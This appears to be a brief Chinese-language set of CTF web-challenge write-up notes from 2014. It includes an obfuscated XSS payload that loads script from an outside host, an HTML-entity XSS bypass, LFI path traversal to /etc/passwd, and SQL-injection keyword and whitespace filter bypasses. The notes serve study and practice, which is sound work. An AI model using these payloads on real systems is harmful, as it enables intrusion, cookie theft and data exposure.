2014

Writeups

Google hacking     x-forwarder-for不行,換另一個Client_ip

.htaccess 不要忘記

Vim編輯文件時產生,它是隱藏文件,原名是data,swp名就是.data.swp。新建個data,vim -r data就可恢復

base64的編碼/9j/4AAQSkZJRgABAQEAYABgAAD,這樣子的,看這個格式是一張base64編碼過的圖片,郵件中傳輸圖像常常使用這種方式。

img src=”data:p_w_picpath/jpg;base64, /9j/4AAQSkZJRgABAQEAYABgAAD/….” />這樣子保存成html就可以解開了。

直接include了進來,可以使用../進行跨目錄的一些操作,包含到/etc/passwd等敏感的文件,在GPC關閉時可以使用進行截斷,造成LFI漏洞。如果GPC開啓時,就會對進行轉義。

onload=document.body.a(createElement_x_x_x_x_x_x_x_x_x(/script/.source)).src=String.fromCharCode(47,47,108,47,51,67,57,101,101,52,63,49,51,57,56,50,52,56,52,48,48);//

使用了fromCharCode編碼 //xss.sinaapp.com/3C9ee4?1398248400 

jsfuck  brainfuck  packed   (pp|rr|jj|aa)encode  

(#!/usr/bin/perl -w length q defined and| #!/usr/bin/env ruby $,^$$&&@_  | $=~[];$={___:++$,$$$$:(! | ω= /`m′) ~┻━┻   //*′`*)

secure標誌是指定cookie要在https的傳輸協議中才會給帶上的,現在的訪問的是正常的http的協議,所以cookie不會被設置上,那麼肯定是順手就在發包中加上了這個cookie,試試看。也沒有什麼反應。

最後是在想display用怎麼用的時候,是一個name=value的形式,然後想到了那個actf上的 way = “H4ck_F0r_Fun!GoGoGo!,是不是也要來試試看。然後就用get方式提交 ?display= 5842b0a0df2d52533c241c6ec26089a8作爲參數。這個時候有了不一樣的回顯。

FTP 有主\被動兩種模式,開端口情況不同。

得知2121端口正是pyftpd監聽的FTP服務端口。上網搜索pyftpd歷史漏洞,找到http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2073,

可知union select 空格,都被過濾掉了

union select 用uniunionon 和selselectect來繞過

空格可以用%09 %0A %0B %0C %0D代替,測試發現%0B是可以繞過的



JPG 格式會有壓縮,所以不大可能基於像數的隱寫,jpg的結尾符0XFFD9來確定


有一種繞過xss過濾的方法是html轉義,(&#形式編碼

<script>alert(1)</script> ---><script>&#097&#108&#101&#114&#116&#040&#049&#041</script>

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章